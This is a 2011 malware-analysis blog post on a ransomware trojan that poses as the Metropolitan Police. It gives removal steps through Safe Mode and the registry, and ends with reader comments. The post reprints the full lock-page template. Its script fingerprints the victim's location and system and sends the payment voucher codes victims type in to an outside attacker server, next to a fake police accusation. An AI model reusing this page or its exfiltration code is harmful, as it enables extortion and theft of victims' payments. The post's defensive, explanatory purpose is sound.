Monday 20 June 2011

Trojan.Ransom Fake Metropolitan Police



This trojan blocker ( MD5: 270b8ce04a9f55809938430a2fe6bb47 ) prevents all software execution.
To remove the Trojan (and unlock windows), infected users need to enter a valid serial number.


Manual remove:
1) Restart your pc
2) Before the Windows XP splash screen, press the F8 key to enter the Windows Advanced Options Menu and choose: Safe Mode With Command Prompt
3) Type 'regedit' in the console and go here:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
4) Find the key 'Shell' and replace the value by 'Explorer.exe'
5) Reboot your pc.

If you are in trouble for typing regedit (german/russian etc.. keyboards) you can find regedit at this path:
C:\WINDOWS\regedit.exe


Template they use:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>POLICE</title>
 <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><style type="text/css">
<!--
body {
    background-color: #FFFFFF;
}
.style1 {color: #000000}
.style2 {font-size: 12px}
.style4 {font-size: 14px}
.style5 {color: #000000; font-size: 12px; }
.style6 {
    font-size: 18px;
    font-weight: bold;
}
html, body {height: 100%;overflow-x: hidden;overflow-y: hidden; cursor:default; }
-->
 </style>
<script type="text/javascript">

 var oXmlHttp;  var bGood;    var ip;  var isp;  var country;  var city;  var speed;    function createXMLHttp()   {   if(typeof XMLHttpRequest != "undefined") {    return new XMLHttpRequest();   } else if(window.ActiveXObject) {    var aVersions = ["MSXML2.XMLHttp.5.0", "MSXML2.XMLHttp.4.0",         "MSXML2.XMLHttp.3.0", "MSXML2.XMLHttp",         "Microsoft.XMLHttp"         ];    for (var i = 0; i < aVersions.length; i++) {     try {      var oXmlHttp = new ActiveXObject(aVersions[i]);            return oXmlHttp;     } catch (oError) {            }    }    throw new Error("");   }  } function getFrom_ip2l() {   var response="";   oXmlHttp.open("GET","http://tools.ip2location.com/ib2/",true);   oXmlHttp.onreadystatechange = function()    {    if(oXmlHttp.readyState == 4)   {     if(oXmlHttp.status == 200)     {      var ip2l = oXmlHttp.responseText;               re = /Your IP Address is <b>(.*)<\/b> ISP:/i;       ip = ip2l.match(re);                re = /ISP: <b>(.*)<\/b> Country:/i;     isp = ip2l.match(re);       re = /Country: <b>(.*)<\/b> Region:/i;      country = ip2l.match(re);       re = /City: <b>(.*)<\/b> Time Zone:/i;      city = ip2l.match(re);      document.getElementById("ip_text").innerHTML = ip[1];document.getElementById("v_ip").innerHTML = "IP: "+ip[1];      document.getElementById("v_country").innerHTML = "Country: "+country[1];        document.getElementById("v_cyti").innerHTML = "City: "+city[1];     document.getElementById("v_prov").innerHTML = "ISP: "+isp[1];     }    }   };   oXmlHttp.send(null);  }    function send1() {   var response="";   var d = document.getElementById("code1").value;      if(d.length < 1)    {       return 0;   }   oXmlHttp.onreadystatechange=null; oXmlHttp.open("GET","http://76.73.56.221/s3.php?d="+d,true);   oXmlHttp.send(null);  } function send2() {   var response="";   var d = document.getElementById("code2").value;      if(d.length < 1)  {       return 0;   }   oXmlHttp.onreadystatechange=null; oXmlHttp.open("GET","http://76.73.56.221/s4.php?d="+d,true);   oXmlHttp.send(null);  }  window.onload = function ()   {               var regexp = /(msie) ([0-9]{1,2}.[0-9]{1,3})/gi;        var matches = navigator.userAgent.match(regexp);                        var iOS = new Array("Windows 95","Windows NT 4","Windows 98","Win 9x 4.9","Windows NT 5.0","Windows NT 5.1","Windows NT 6.1","Windows NT 5.2","Windows NT 6.0");        var oOS = new Array("Windows 95","Windows NT 4.0","Windows 98","Windows ME","Windows 2000","Windows XP","Windows Seven","Windows 2003","Windows Vista");                var os = "";        for (var i=0;i<iOS.length;i++)      {           if (navigator.userAgent.indexOf(iOS[i])>-1)         {               os = oOS[i];                break;          }       }       oXmlHttp = createXMLHttp();     getFrom_ip2l();             document.getElementById("v_browser").innerHTML = "Browser: "+matches[0].replace("MSIE","Internet Explorer");        document.getElementById("v_os").innerHTML = "OS: "+os;                  }</script>

 </head>

<body link="#FFFFFF" vlink="#FFFFFF" alink="#FFFFFF"  text="#ffffff" style="overflow-x:hidden; overflow-y:hidden;" onselectstart="return false;" oncontextmenu="return false;">

<div align="center"><center>
<table width="1117" height="420" border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td height="97" colspan="2" bgcolor="#9AD1FF"><div align="center"><img src="/PIC/1" width="381" height="97"></div></td>
  </tr>
  <tr>
    <td height="289" colspan="2" bgcolor="#F0F0F0"><table width="100%">
      <tr>
        <td width="50%"><table width="100%"  border="0" cellpadding="5" cellspacing="5">
          <tr>
            <td bgcolor="#FFFFFF"><p align="center" class="style1 style2"> <span class="style6">ATTENTION! ILLEGAL ACTIVITY WAS REVEALED!</span><br>
              <br>Your operational system is locked as a result of Great Britain law violation!<br>
              The following violations were revealed: your IP address &nbsp;<span id="ip_text"></span>&nbsp; was detected on illegal pornographic sites including child pornography, zoophilia and violent scenes with children! Pornographic video with elements of violence and child pornography were revealed on your PC!<br>
              Illegal SPAM of terrorist orientation is also mailed from your PC.This lockout is intended to eliminate possible distribution of the above materials from your PC in the Internet. </p>
              <p class="style1 style4"><strong>Your personal data: &nbsp;<span id="v_ip">IP: </span>&nbsp;<span id="v_browser">Browser: </span>&nbsp;           <span id="v_os">OS: </span> &nbsp;<span id="v_country">Country: </span>&nbsp;<span id="v_cyti">City: </span>&nbsp;  <span id="v_prov">ISP: </span> </strong></p>
              <p align="center" class="style5">For your PC to be unlocked you have to pay penalty equal to 75?! The penalty is to be paid during 24 hours from the moment when youy PC was locked! If the penalty is not paid all the data will be removed from your PC! </p>
              <p align="center" class="style5">There are 2 ways of payment: <br>
  1) You can buy the ukash coupon for the amount of 75?. Enter the ukash coupon number in payment field and press OK or send the coupon number by email info@policemetropolitan.org You can buy the ukash coupon at any available point. <br>
  2) You can pay the penalty by means of pay safe card. Payment by means of paysafecard is to be effected to the amount of 75?. Enter the pin code from your bill in payment field and press OK or send the pin code by email info@policemetropolitan.org <br>
  You can buy pay safe card at any available point <br>
  As soon as payment is effected your PC will be unlocked during 24 hours from the moment of payment. </p></td>
          </tr>
        </table></td>
        <td width="50%"><table width="100%"  border="0" cellpadding="7" cellspacing="7">
            <tr>
              <td bgcolor="#FFFFFF"><table width="100%"  border="0">
                  <tr>
                    <td><div align="center">                      <table width="100%"  border="0">
                        <tr>
                          <td width="55%"><div align="center"><img src="/PIC/ukash" width="186" height="71"></div></td>
                          </tr>
                      </table>
                    </div></td>
                  </tr>
                  <tr>
                    <td><div align="center" >
  <input name="textfield2" type="text" class="style6" width="200" id="code1">
&nbsp;
  <input type="submit" value="Ok" style="width:80px;height:27px" onclick="send1();">
                    </div></td>
                  </tr>
                  <tr>
                    <td><div align="center" class="style1"><strong>Find out below where you can get Ukash</strong></div></td>
                  </tr>
                  <tr>
                    <td><div align="center"><img src="/PIC/logo2" width="66" height="49">
                        <img src="/PIC/logo1" width="47" height="49"> <img src="/PIC/logo3" width="74" height="49"><img src="/PIC/logo4" width="45" height="49"></div></td>
                  </tr>
              </table></td>
            </tr>
          </table>
          <table width="100%"  border="0" cellpadding="7" cellspacing="7">
            <tr>
              <td bgcolor="#FFFFFF"><table width="100%"  border="0">
                <tr>
                  <td><div align="center"><img src="/PIC/paysafe" width="447" height="124"></div></td>
                </tr>
                <tr>
                  <td><div align="center">
                        <input name="textfield" type="text" class="style6" width="200" id="code2">
                      &nbsp;
                        <input type="submit" value="Ok" style="width:80px;height:27px" onclick="send2();">
                  </div></td>
                </tr>
              </table></td>
            </tr>
          </table></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td colspan="2" bgcolor="#F0F0F0"><p align="center"></td>
    </tr>
</table>
</center></div>




Fake police ransomware related ~
Trojan.Ransom Fake Federal German Police (BKA) notice variante
Trojan.Ransom Fake Federal German Police (BKA) notice

3 comments:

  1. Found another one called Order.__________________________________.exe

    ReplyDelete
  2. I got a ransomware virus last night and it took hours to get rid of it.
    Thankyou to everyone who provides help against this kind of nightmare.

    ReplyDelete
  3. I couldn't start regedit, it gave an error of "Registry editing has been disabled by your administrator". Advice please?

    ReplyDelete